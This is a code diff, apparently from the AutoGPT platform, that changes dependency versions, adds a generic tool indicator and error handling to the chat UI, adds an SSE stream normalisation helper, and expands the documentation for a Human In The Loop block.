 autogpt-libs = { path = "../autogpt_libs", develop = true }
 bleach = { extras = ["css"], version = "^6.2.0" }
+claude-agent-sdk = "^0.1.0"
 click = "^8.2.0"
 cryptography = "^46.0"
 discord-py = "^2.5.2"
-e2b-code-interpreter = "^2.4.1"
+e2b-code-interpreter = "^1.5.2"
 elevenlabs = "^1.50.0"
 fastapi = "^0.128.6"
 feedparser = "^6.0.11"

@@ -29,7 +30,7 @@ google-auth-oauthlib = "^1.2.2"
 google-cloud-storage = "^3.2.0"
 googlemaps = "^4.10.0"
 gravitasml = "^0.1.4"
-groq = "^1.0.0"
+groq = "^0.30.0"
 html2text = "^2024.2.26"
 jinja2 = "^3.1.6"
 jsonref = "^1.1.0"

@@ -58,21 +59,21 @@ pytest = "^8.4.1"
 pytest-asyncio = "^1.1.0"
 python-dotenv = "^1.1.1"
 python-multipart = "^0.0.22"
-redis = "^7.1.1"
+redis = "^6.2.0"
 regex = "^2025.9.18"
 replicate = "^1.0.6"
 sentry-sdk = {extras = ["anthropic", "fastapi", "launchdarkly", "openai", "sqlalchemy"], version = "^2.44.0"}
 sqlalchemy = "^2.0.40"
 strenum = "^0.4.9"
 stripe = "^11.5.0"
-supabase = "2.28.0"
+supabase = "2.27.3"
 tenacity = "^9.1.4"
-todoist-api-python = "^3.2.1"
+todoist-api-python = "^2.1.7"
 tweepy = "^4.16.0"
 uvicorn = { extras = ["standard"], version = "^0.40.0" }
 websockets = "^15.0"
 youtube-transcript-api = "^1.2.1"
-yt-dlp = "2026.2.4"
+yt-dlp = "2025.12.08"
 zerobouncesdk = "^1.1.2"
 # NOTE: please insert new dependencies in their alphabetical location
 pytest-snapshot = "^0.9.0"

@@ -85,7 +86,7 @@ pandas = "^2.3.1"
 firecrawl-py = "^4.3.6"
 exa-py = "^1.14.20"
 croniter = "^6.0.0"
-stagehand = "^3.5.0"
+stagehand = "^0.5.1"
 gravitas-md2gdocs = "^0.1.0"
 posthog = "^7.6.0"

@@ -94,7 +95,7 @@ aiohappyeyeballs = "^2.6.1"
 black = "^24.10.0"
 faker = "^38.2.0"
 httpx = "^0.28.1"
-isort = "^7.0.0"
+isort = "^5.13.2"
 poethepoet = "^0.41.0"
 pre-commit = "^4.4.0"
 pyright = "^1.1.407"
@@ -10,8 +10,9 @@ import {
   MessageResponse,
 } from "@/components/ai-elements/message";
 import { LoadingSpinner } from "@/components/atoms/LoadingSpinner/LoadingSpinner";
+import { toast } from "@/components/molecules/Toast/use-toast";
 import { ToolUIPart, UIDataTypes, UIMessage, UITools } from "ai";
-import { useEffect, useState } from "react";
+import { useEffect, useRef, useState } from "react";
 import { CreateAgentTool } from "../../tools/CreateAgent/CreateAgent";
 import { EditAgentTool } from "../../tools/EditAgent/EditAgent";
 import { FindAgentsTool } from "../../tools/FindAgents/FindAgents";
@@ -19,6 +20,7 @@ import { FindBlocksTool } from "../../tools/FindBlocks/FindBlocks";
 import { RunAgentTool } from "../../tools/RunAgent/RunAgent";
 import { RunBlockTool } from "../../tools/RunBlock/RunBlock";
 import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs";
+import { GenericTool } from "../../tools/GenericTool/GenericTool";
 import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput";
 
 // ---------------------------------------------------------------------------
@@ -121,6 +123,7 @@ export const ChatMessagesContainer = ({
   isLoading,
 }: ChatMessagesContainerProps) => {
   const [thinkingPhrase, setThinkingPhrase] = useState(getRandomPhrase);
+  const lastToastTimeRef = useRef(0);
 
   useEffect(() => {
     if (status === "submitted") {
@@ -128,6 +131,20 @@ export const ChatMessagesContainer = ({
     }
   }, [status]);
 
+  // Show a toast when a new error occurs, debounced to avoid spam
+  useEffect(() => {
+    if (!error) return;
+    const now = Date.now();
+    if (now - lastToastTimeRef.current < 3_000) return;
+    lastToastTimeRef.current = now;
+    toast({
+      variant: "destructive",
+      title: "Something went wrong",
+      description:
+        "The assistant encountered an error. Please try sending your message again.",
+    });
+  }, [error]);
+
   const lastMessage = messages[messages.length - 1];
   const lastAssistantHasVisibleContent =
     lastMessage?.role === "assistant" &&
@@ -239,6 +256,16 @@ export const ChatMessagesContainer = ({
             />
           );
         default:
+          // Render a generic tool indicator for SDK built-in
+          // tools (Read, Glob, Grep, etc.) or any unrecognized tool
+          if (part.type.startsWith("tool-")) {
+            return (
+              <GenericTool
+                key={`${message.id}-${i}`}
+                part={part as ToolUIPart}
+              />
+            );
+          }
           return null;
       }
     })}
@@ -263,8 +290,12 @@ export const ChatMessagesContainer = ({
           </Message>
         )}
         {error && (
-          <div className="rounded-lg bg-red-50 p-3 text-red-600">
-            Error: {error.message}
+          <div className="rounded-lg bg-red-50 p-4 text-sm text-red-700">
+            <p className="font-medium">Something went wrong</p>
+            <p className="mt-1 text-red-600">
+              The assistant encountered an error. Please try sending your
+              message again.
+            </p>
           </div>
         )}
       </ConversationContent>
@@ -30,7 +30,7 @@ export function ContentCard({
   return (
     <div
       className={cn(
-        "rounded-lg bg-gradient-to-r from-purple-500/30 to-blue-500/30 p-[1px]",
+        "min-w-0 rounded-lg bg-gradient-to-r from-purple-500/30 to-blue-500/30 p-[1px]",
        className,
      )}
    >
@@ -4,7 +4,6 @@ import { WarningDiamondIcon } from "@phosphor-icons/react";
 import type { ToolUIPart } from "ai";
 import { useCopilotChatActions } from "../../components/CopilotChatActionsProvider/useCopilotChatActions";
 import { MorphingTextAnimation } from "../../components/MorphingTextAnimation/MorphingTextAnimation";
-import { OrbitLoader } from "../../components/OrbitLoader/OrbitLoader";
 import { ProgressBar } from "../../components/ProgressBar/ProgressBar";
 import {
   ContentCardDescription,
@@ -77,7 +76,7 @@ function getAccordionMeta(output: CreateAgentToolOutput) {
     isOperationInProgressOutput(output)
   ) {
     return {
-      icon: <OrbitLoader size={32} />,
+      icon,
       title: "Creating agent, this may take a few minutes. Sit back and relax.",
     };
   }
@@ -0,0 +1,63 @@
+"use client";
+
+import { ToolUIPart } from "ai";
+import { GearIcon } from "@phosphor-icons/react";
+import { MorphingTextAnimation } from "../../components/MorphingTextAnimation/MorphingTextAnimation";
+
+interface Props {
+  part: ToolUIPart;
+}
+
+function extractToolName(part: ToolUIPart): string {
+  // ToolUIPart.type is "tool-{name}", extract the name portion.
+  return part.type.replace(/^tool-/, "");
+}
+
+function formatToolName(name: string): string {
+  // "search_docs" → "Search docs", "Read" → "Read"
+  return name.replace(/_/g, " ").replace(/^\w/, (c) => c.toUpperCase());
+}
+
+function getAnimationText(part: ToolUIPart): string {
+  const label = formatToolName(extractToolName(part));
+
+  switch (part.state) {
+    case "input-streaming":
+    case "input-available":
+      return `Running ${label}…`;
+    case "output-available":
+      return `${label} completed`;
+    case "output-error":
+      return `${label} failed`;
+    default:
+      return `Running ${label}…`;
+  }
+}
+
+export function GenericTool({ part }: Props) {
+  const isStreaming =
+    part.state === "input-streaming" || part.state === "input-available";
+  const isError = part.state === "output-error";
+
+  return (
+    <div className="py-2">
+      <div className="flex items-center gap-2 text-sm text-muted-foreground">
+        <GearIcon
+          size={14}
+          weight="regular"
+          className={
+            isError
+              ? "text-red-500"
+              : isStreaming
+                ? "animate-spin text-neutral-500"
+                : "text-neutral-400"
+          }
+        />
+        <MorphingTextAnimation
+          text={getAnimationText(part)}
+          className={isError ? "text-red-500" : undefined}
+        />
+      </div>
+    </div>
+  );
+}
@@ -203,7 +203,7 @@ export function getAccordionMeta(output: RunAgentToolOutput): {
       ? output.status.trim()
       : "started";
     return {
-      icon: <OrbitLoader size={28} className="text-neutral-700" />,
+      icon,
       title: output.graph_name,
       description: `Status: ${statusText}`,
     };
|||||||
@@ -149,7 +149,7 @@ export function getAccordionMeta(output: RunBlockToolOutput): {
|
|||||||
if (isRunBlockBlockOutput(output)) {
|
if (isRunBlockBlockOutput(output)) {
|
||||||
const keys = Object.keys(output.outputs ?? {});
|
const keys = Object.keys(output.outputs ?? {});
|
||||||
return {
|
return {
|
||||||
icon: <OrbitLoader size={24} className="text-neutral-700" />,
|
icon,
|
||||||
title: output.block_name,
|
title: output.block_name,
|
||||||
description:
|
description:
|
||||||
keys.length > 0
|
keys.length > 0
|
||||||
|
|||||||
@@ -1,11 +1,8 @@
 import { environment } from "@/services/environment";
 import { getServerAuthToken } from "@/lib/autogpt-server-api/helpers";
 import { NextRequest } from "next/server";
+import { normalizeSSEStream, SSE_HEADERS } from "../../../sse-helpers";
 
-/**
- * SSE Proxy for chat streaming.
- * Supports POST with context (page content + URL) in the request body.
- */
 export async function POST(
   request: NextRequest,
   { params }: { params: Promise<{ sessionId: string }> },
@@ -23,17 +20,14 @@ export async function POST(
     );
   }
 
-    // Get auth token from server-side session
     const token = await getServerAuthToken();
 
-    // Build backend URL
     const backendUrl = environment.getAGPTServerBaseUrl();
     const streamUrl = new URL(
       `/api/chat/sessions/${sessionId}/stream`,
       backendUrl,
     );
 
-    // Forward request to backend with auth header
     const headers: Record<string, string> = {
       "Content-Type": "application/json",
       Accept: "text/event-stream",
@@ -63,14 +57,15 @@ export async function POST(
       });
     }
 
-    // Return the SSE stream directly
-    return new Response(response.body, {
-      headers: {
-        "Content-Type": "text/event-stream",
-        "Cache-Control": "no-cache, no-transform",
-        Connection: "keep-alive",
-        "X-Accel-Buffering": "no",
-      },
+    if (!response.body) {
+      return new Response(
+        JSON.stringify({ error: "Empty response from chat service" }),
+        { status: 502, headers: { "Content-Type": "application/json" } },
+      );
+    }
+
+    return new Response(normalizeSSEStream(response.body), {
+      headers: SSE_HEADERS,
     });
   } catch (error) {
     console.error("SSE proxy error:", error);
@@ -87,13 +82,6 @@ export async function POST(
   }
 }
 
-/**
- * Resume an active stream for a session.
- *
- * Called by the AI SDK's `useChat(resume: true)` on page load.
- * Proxies to the backend which checks for an active stream and either
- * replays it (200 + SSE) or returns 204 No Content.
- */
 export async function GET(
   _request: NextRequest,
   { params }: { params: Promise<{ sessionId: string }> },
@@ -124,7 +112,6 @@ export async function GET(
       headers,
     });
 
-    // 204 = no active stream to resume
     if (response.status === 204) {
       return new Response(null, { status: 204 });
     }
@@ -137,12 +124,13 @@ export async function GET(
       });
     }
 
-    return new Response(response.body, {
+    if (!response.body) {
+      return new Response(null, { status: 204 });
+    }
+
+    return new Response(normalizeSSEStream(response.body), {
       headers: {
-        "Content-Type": "text/event-stream",
-        "Cache-Control": "no-cache, no-transform",
-        Connection: "keep-alive",
-        "X-Accel-Buffering": "no",
+        ...SSE_HEADERS,
         "x-vercel-ai-ui-message-stream": "v1",
       },
     });
72 autogpt_platform/frontend/src/app/api/chat/sse-helpers.ts Normal file
@@ -0,0 +1,72 @@
+export const SSE_HEADERS = {
+  "Content-Type": "text/event-stream",
+  "Cache-Control": "no-cache, no-transform",
+  Connection: "keep-alive",
+  "X-Accel-Buffering": "no",
+} as const;
+
+export function normalizeSSEStream(
+  input: ReadableStream<Uint8Array>,
+): ReadableStream<Uint8Array> {
+  const decoder = new TextDecoder();
+  const encoder = new TextEncoder();
+  let buffer = "";
+
+  return input.pipeThrough(
+    new TransformStream<Uint8Array, Uint8Array>({
+      transform(chunk, controller) {
+        buffer += decoder.decode(chunk, { stream: true });
+
+        const parts = buffer.split("\n\n");
+        buffer = parts.pop() ?? "";
+
+        for (const part of parts) {
+          const normalized = normalizeSSEEvent(part);
+          controller.enqueue(encoder.encode(normalized + "\n\n"));
+        }
+      },
+      flush(controller) {
+        if (buffer.trim()) {
+          const normalized = normalizeSSEEvent(buffer);
+          controller.enqueue(encoder.encode(normalized + "\n\n"));
+        }
+      },
+    }),
+  );
+}
+
+function normalizeSSEEvent(event: string): string {
+  const lines = event.split("\n");
+  const dataLines: string[] = [];
+  const otherLines: string[] = [];
+
+  for (const line of lines) {
+    if (line.startsWith("data: ")) {
+      dataLines.push(line.slice(6));
+    } else {
+      otherLines.push(line);
+    }
+  }
+
+  if (dataLines.length === 0) return event;
+
+  const dataStr = dataLines.join("\n");
+  try {
+    const parsed = JSON.parse(dataStr) as Record<string, unknown>;
+    if (parsed.type === "error") {
+      const normalized = {
+        type: "error",
+        errorText:
+          typeof parsed.errorText === "string"
+            ? parsed.errorText
+            : "An unexpected error occurred",
+      };
+      const newData = `data: ${JSON.stringify(normalized)}`;
+      return [...otherLines.filter((l) => l.length > 0), newData].join("\n");
+    }
+  } catch {
+    // Not valid JSON — pass through as-is
+  }
+
+  return event;
+}
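Concretely, normalizeSSEEvent only rewrites events whose JSON payload has type "error", reducing them to a stable { type, errorText } shape; every other event passes through untouched. An invented before/after on the wire:

```
before:  data: {"type":"error","errorText":"Upstream timeout","status":502}
after:   data: {"type":"error","errorText":"Upstream timeout"}

before:  data: {"type":"text-delta","delta":"Hello"}
after:   data: {"type":"text-delta","delta":"Hello"}   (unchanged)
```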
@@ -1,20 +1,8 @@
 import { environment } from "@/services/environment";
 import { getServerAuthToken } from "@/lib/autogpt-server-api/helpers";
 import { NextRequest } from "next/server";
+import { normalizeSSEStream, SSE_HEADERS } from "../../../sse-helpers";
 
-/**
- * SSE Proxy for task stream reconnection.
- *
- * This endpoint allows clients to reconnect to an ongoing or recently completed
- * background task's stream. It replays missed messages from Redis Streams and
- * subscribes to live updates if the task is still running.
- *
- * Client contract:
- * 1. When receiving an operation_started event, store the task_id
- * 2. To reconnect: GET /api/chat/tasks/{taskId}/stream?last_message_id={idx}
- * 3. Messages are replayed from the last_message_id position
- * 4. Stream ends when "finish" event is received
- */
 export async function GET(
   request: NextRequest,
   { params }: { params: Promise<{ taskId: string }> },
@@ -24,15 +12,12 @@ export async function GET(
   const lastMessageId = searchParams.get("last_message_id") || "0-0";
 
   try {
-    // Get auth token from server-side session
     const token = await getServerAuthToken();
 
-    // Build backend URL
     const backendUrl = environment.getAGPTServerBaseUrl();
     const streamUrl = new URL(`/api/chat/tasks/${taskId}/stream`, backendUrl);
     streamUrl.searchParams.set("last_message_id", lastMessageId);
 
-    // Forward request to backend with auth header
     const headers: Record<string, string> = {
       Accept: "text/event-stream",
       "Cache-Control": "no-cache",
@@ -56,14 +41,12 @@ export async function GET(
       });
     }
 
-    // Return the SSE stream directly
-    return new Response(response.body, {
-      headers: {
-        "Content-Type": "text/event-stream",
-        "Cache-Control": "no-cache, no-transform",
-        Connection: "keep-alive",
-        "X-Accel-Buffering": "no",
-      },
+    if (!response.body) {
+      return new Response(null, { status: 204 });
+    }
+
+    return new Response(normalizeSSEStream(response.body), {
+      headers: SSE_HEADERS,
     });
   } catch (error) {
     console.error("Task stream proxy error:", error);
@@ -7022,29 +7022,24 @@
         "input_schema": {
           "additionalProperties": true,
           "type": "object",
-          "title": "Input Schema"
+          "title": "Input Schema",
+          "description": "Full JSON schema for block inputs"
         },
         "output_schema": {
           "additionalProperties": true,
           "type": "object",
-          "title": "Output Schema"
+          "title": "Output Schema",
+          "description": "Full JSON schema for block outputs"
         },
         "required_inputs": {
           "items": { "$ref": "#/components/schemas/BlockInputFieldInfo" },
           "type": "array",
           "title": "Required Inputs",
-          "description": "List of required input fields for this block"
+          "description": "List of input fields for this block"
         }
       },
       "type": "object",
-      "required": [
-        "id",
-        "name",
-        "description",
-        "categories",
-        "input_schema",
-        "output_schema"
-      ],
+      "required": ["id", "name", "description", "categories"],
       "title": "BlockInfoSummary",
       "description": "Summary of a block for search results."
     },
@@ -7090,7 +7085,7 @@
       "usage_hint": {
         "type": "string",
         "title": "Usage Hint",
-        "default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the required fields from input_schema."
+        "default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the fields listed in required_inputs."
       }
     },
     "type": "object",
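The updated usage_hint pairs with the relaxed required list above: input_schema and output_schema may now be absent from a summary, so callers are steered toward required_inputs instead. A hypothetical run_block payload following that hint (the block id and input field names below are invented for illustration; only the block_id and input_data parameter names come from the hint itself):

```python
# Hypothetical arguments for a run_block call, per the updated usage_hint:
# block_id is the "id" field of a block returned by search, and input_data
# supplies the fields listed in that block's required_inputs.
run_block_args = {
    "block_id": "3b191d9f-f910-4a15-9886-e6826f4f1d47",
    "input_data": {
        "location": "Berlin",
        "units": "metric",
    },
}
```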
@@ -61,7 +61,7 @@ Below is a comprehensive list of all available blocks, categorized by their prim
 | [Get List Item](block-integrations/basic.md#get-list-item) | Returns the element at the given index |
 | [Get Store Agent Details](block-integrations/system/store_operations.md#get-store-agent-details) | Get detailed information about an agent from the store |
 | [Get Weather Information](block-integrations/basic.md#get-weather-information) | Retrieves weather information for a specified location using OpenWeatherMap API |
-| [Human In The Loop](block-integrations/basic.md#human-in-the-loop) | Pause execution and wait for human approval or modification of data |
+| [Human In The Loop](block-integrations/basic.md#human-in-the-loop) | Pause execution for human review |
 | [List Is Empty](block-integrations/basic.md#list-is-empty) | Checks if a list is empty |
 | [List Library Agents](block-integrations/system/library_operations.md#list-library-agents) | List all agents in your personal library |
 | [Note](block-integrations/basic.md#note) | A visual annotation block that displays a sticky note in the workflow editor for documentation and organization purposes |
@@ -975,7 +975,7 @@ A travel planning application could use this block to provide users with current
 ## Human In The Loop
 
 ### What it is
-Pause execution and wait for human approval or modification of data
+Pause execution for human review. Data flows through approved_data or rejected_data output based on the reviewer's decision. Outputs contain the actual data, not status strings.
 
 ### How it works
 <!-- MANUAL: how_it_works -->
@@ -988,18 +988,18 @@ This enables human oversight at critical points in automated workflows, ensuring
 
 | Input | Description | Type | Required |
 |-------|-------------|------|----------|
-| data | The data to be reviewed by a human user | Data | Yes |
-| name | A descriptive name for what this data represents | str | Yes |
-| editable | Whether the human reviewer can edit the data | bool | No |
+| data | The data to be reviewed by a human user. This exact data will be passed through to either approved_data or rejected_data output based on the reviewer's decision. | Data | Yes |
+| name | A descriptive name for what this data represents. This helps the reviewer understand what they are reviewing. | str | Yes |
+| editable | Whether the human reviewer can edit the data before approving or rejecting it | bool | No |
 
 ### Outputs
 
 | Output | Description | Type |
 |--------|-------------|------|
 | error | Error message if the operation failed | str |
-| approved_data | The data when approved (may be modified by reviewer) | Approved Data |
-| rejected_data | The data when rejected (may be modified by reviewer) | Rejected Data |
-| review_message | Any message provided by the reviewer | str |
+| approved_data | Outputs the input data when the reviewer APPROVES it. The value is the actual data itself (not a status string like 'APPROVED'). If the reviewer edited the data, this contains the modified version. Connect downstream blocks here for the 'approved' workflow path. | Approved Data |
+| rejected_data | Outputs the input data when the reviewer REJECTS it. The value is the actual data itself (not a status string like 'REJECTED'). If the reviewer edited the data, this contains the modified version. Connect downstream blocks here for the 'rejected' workflow path. | Rejected Data |
+| review_message | Optional message provided by the reviewer explaining their decision. Only outputs when the reviewer provides a message; this pin does not fire if no message was given. | str |
 
 ### Possible use case
 <!-- MANUAL: use_case -->
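A worked illustration of the pass-through behaviour described in these tables (all values invented):

```
data     = {"subject": "Q3 report", "body": "Draft attached"}
name     = "Outgoing email"
editable = true

Reviewer edits the subject and clicks APPROVE, leaving a note:
  approved_data  -> {"subject": "Q3 report (final)", "body": "Draft attached"}
  rejected_data  -> does not fire
  review_message -> "Tightened the subject line"
```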